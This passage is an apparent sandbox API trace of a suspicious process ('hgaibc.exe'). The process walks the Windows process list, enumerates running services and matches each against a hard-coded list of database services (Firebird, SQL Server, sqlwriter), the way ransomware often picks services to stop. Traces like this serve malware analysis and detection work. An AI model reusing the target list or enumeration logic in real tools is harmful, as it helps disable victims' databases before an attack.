lpString2="ShellHWDetection") returned -1 [0165.906] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0165.906] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0165.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0165.907] lstrlenW (lpString="Spooler") returned 7 [0165.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0165.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0165.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0165.907] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0165.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0165.907] lstrlenW (lpString="StateRepository") returned 15 [0165.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0165.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0165.907] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0165.907] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0165.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0165.907] lstrlenW (lpString="SysMain") returned 7 [0165.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0165.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0165.907] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0165.907] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0165.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0165.907] lstrlenW (lpString="SystemEventsBroker") returned 18 [0165.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0165.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0165.908] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0165.908] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0165.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0165.908] lstrlenW (lpString="Themes") returned 6 [0165.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0165.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0165.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0165.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0165.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0165.908] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0165.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0165.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0165.908] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0165.908] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0165.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a4f50 | out: hHeap=0x6a0000) returned 1 [0165.908] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x484 [0165.912] Process32FirstW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.913] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0165.914] lstrlenW (lpString="System") returned 6 [0165.914] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0165.915] lstrlenW (lpString="smss.exe") returned 8 [0165.915] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.916] lstrlenW (lpString="csrss.exe") returned 9 [0165.916] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0165.917] lstrlenW (lpString="wininit.exe") returned 11 [0165.917] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.918] lstrlenW (lpString="csrss.exe") returned 9 [0165.918] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0165.919] lstrlenW (lpString="winlogon.exe") returned 12 [0165.919] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0165.920] lstrlenW (lpString="services.exe") returned 12 [0165.920] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0165.921] lstrlenW (lpString="lsass.exe") returned 9 [0165.921] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0165.921] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0165.922] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0165.922] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0165.922] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.923] lstrlenW (lpString="svchost.exe") returned 11 [0165.923] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.924] lstrlenW (lpString="svchost.exe") returned 11 [0165.924] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0165.925] lstrlenW (lpString="dwm.exe") returned 7 [0165.925] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.925] lstrlenW (lpString="svchost.exe") returned 11 [0165.925] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.926] lstrlenW (lpString="svchost.exe") returned 11 [0165.926] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.927] lstrlenW (lpString="svchost.exe") returned 11 [0165.927] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.927] lstrlenW (lpString="svchost.exe") returned 11 [0165.927] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.928] lstrlenW (lpString="svchost.exe") returned 11 [0165.928] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.929] lstrlenW (lpString="svchost.exe") returned 11 [0165.929] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.930] lstrlenW (lpString="svchost.exe") returned 11 [0165.930] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.931] lstrlenW (lpString="svchost.exe") returned 11 [0165.931] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.931] lstrlenW (lpString="svchost.exe") returned 11 [0165.931] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.932] lstrlenW (lpString="svchost.exe") returned 11 [0165.932] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.933] lstrlenW (lpString="spoolsv.exe") returned 11 [0165.933] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.934] lstrlenW (lpString="svchost.exe") returned 11 [0165.934] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.934] lstrlenW (lpString="audiodg.exe") returned 11 [0165.934] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0165.935] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0165.935] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0166.108] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0166.108] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0166.109] lstrlenW (lpString="Memory Compression") returned 18 [0166.109] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0166.110] lstrlenW (lpString="sihost.exe") returned 10 [0166.110] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.111] lstrlenW (lpString="svchost.exe") returned 11 [0166.111] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0166.112] lstrlenW (lpString="msoia.exe") returned 9 [0166.112] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0166.113] lstrlenW (lpString="taskhostw.exe") returned 13 [0166.113] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.114] lstrlenW (lpString="explorer.exe") returned 12 [0166.114] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0166.114] lstrlenW (lpString="SearchUI.exe") returned 12 [0166.115] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0166.115] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0166.115] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0166.116] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0166.116] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.117] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0166.117] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0166.118] lstrlenW (lpString="hgaibc.exe") returned 10 [0166.118] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0166.119] lstrlenW (lpString="cmd.exe") returned 7 [0166.119] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0166.120] lstrlenW (lpString="conhost.exe") returned 11 [0166.120] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0166.121] lstrlenW (lpString="mode.com") returned 8 [0166.121] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0166.121] lstrlenW (lpString="consent.exe") returned 11 [0166.121] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0166.122] CloseHandle (hObject=0x484) returned 1 [0166.122] Sleep (dwMilliseconds=0x1f4) [0166.896] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c498 [0166.897] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0166.898] GetLastError () returned 0xea [0166.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x4595010 [0166.898] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4595010, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4595010, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0166.899] CloseServiceHandle (hSCObject=0x458c498) returned 1 [0166.899] lstrlenW (lpString="Appinfo") returned 7 [0166.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0166.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0166.899] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0166.899] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0166.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0166.899] lstrlenW (lpString="AppXSvc") returned 7 [0166.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0166.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0166.899] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0166.899] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0166.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0166.899] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0166.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0166.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0166.900] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0166.900] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0166.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0166.900] lstrlenW (lpString="Audiosrv") returned 8 [0166.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0166.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0166.900] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0166.900] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0166.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0166.900] lstrlenW (lpString="BFE") returned 3 [0166.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0166.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0166.900] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0166.900] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0166.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0166.900] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0166.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0166.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0166.900] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0166.900] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0166.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0166.900] lstrlenW (lpString="CDPSvc") returned 6 [0166.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0166.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0166.900] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0166.901] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0166.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0166.901] lstrlenW (lpString="ClickToRunSvc") returned 13 [0166.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0166.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0166.901] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0166.901] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0166.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0166.901] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0166.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0166.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0166.901] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0166.901] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0166.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0166.901] lstrlenW (lpString="CryptSvc") returned 8 [0166.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0166.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0166.901] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0166.901] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0166.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0166.901] lstrlenW (lpString="DcomLaunch") returned 10 [0166.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0166.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0166.901] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0166.901] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0166.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0166.901] lstrlenW (lpString="DeviceAssociationService") returned 24 [0166.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0166.902] lstrcmpiW 